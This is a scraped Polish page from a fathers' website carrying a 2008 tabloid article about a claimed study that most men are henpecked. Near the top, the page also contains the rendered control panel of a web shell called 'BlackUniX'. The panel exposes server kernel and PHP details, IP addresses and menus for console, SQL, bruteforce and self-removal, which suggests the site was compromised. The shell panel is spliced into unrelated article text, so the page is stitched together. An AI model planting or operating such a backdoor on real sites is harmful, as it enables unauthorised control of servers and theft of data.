W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:19:04
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

90 proc. z nas to pantoflarze
26.06.2008.
Jak mówią wyniki badań cytowanych przez "Super Express", 90 proc. facetów to pantoflarze. Do tego 3/4 nawet nie zdaje sobie z tego sprawy.Gazeta przytacza badania belgijskich naukowców, którzy właśnie wyliczyli, że dziewięciu na dziesięciu mężczyzn robi wszystko tak, jak chcą tego od nich panie.
Co gorsza, aż 75 proc. jest przy tym przekonanych, że podejmuje własne, autonomiczne decyzje.

Choć nie można wykluczyć, że po prostu świetnie udajemy, iż robimy tak, jak ona chce, gdy tymczasem jest zupełnie inaczej, to wyniki i tak są porażające.

- Najczęściej jako broń w walce płci wykorzystywany jest wygląd - pisze "Super Express". Kobieta po prostu uzbraja się w krótsza spódniczkę i głęboki dekolt i rusza do akcji "urabiania". To strategia stosowana w 1/3 wszystkich przypadków.

Belgijscy naukowcy nie ograniczyli się do zbadania stopnia naszego pantoflarstwa i postarali się wyróżnić trzy podstawowe zagrywki nabierania nas przez panie. Oto one:
czytaj dalej
 

• sierotka Marysia - czyli dobrze znana fanom współczesnych bajek o Shreku "mina kota w butach". Proszący głos, łezka w oku, głęboki smutek i tęsknota na twarzy to charakterystyka tej zagrywki.

• Nieposkromiona złośnica - podobno, gdy wystarczająco długo nasłuchamy się, jacy jesteśmy okropni, wymiękamy i dajemy się urobić na podobieństwo tego, czym według naszych kobiet moglibyśmy być.

• "Śpisz dziś na kanapie!" - to najgroźniejsza broń, której nie wiadomo czemu nie zakazuje Konwencja Genewska. Naukowcy twierdzą, że pod wpływem tego szantażu jesteśmy gotowi zrobić wszystko.

    * Pułapka przesadnej troski

      Większość kobiet marzy o księciu z bajki, ale księżniczki są kapryśne, a spełnianie każdej jej zachcianki może sprawić, że szybko się znudzisz. więcej »

Wyników nie komentujemy. Przypominamy natomiast, że wedlug znawców damsko-męskich relacji, nadmierne uleganie drugiej stronie raczej nie kończy się dobrze. Kobietom wcześniej czy później nudzą się ulegli faceci i zaczynają szukać takich, którym same mogłyby ulec...

Źródło informacji: INTERIA.PL
 
następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.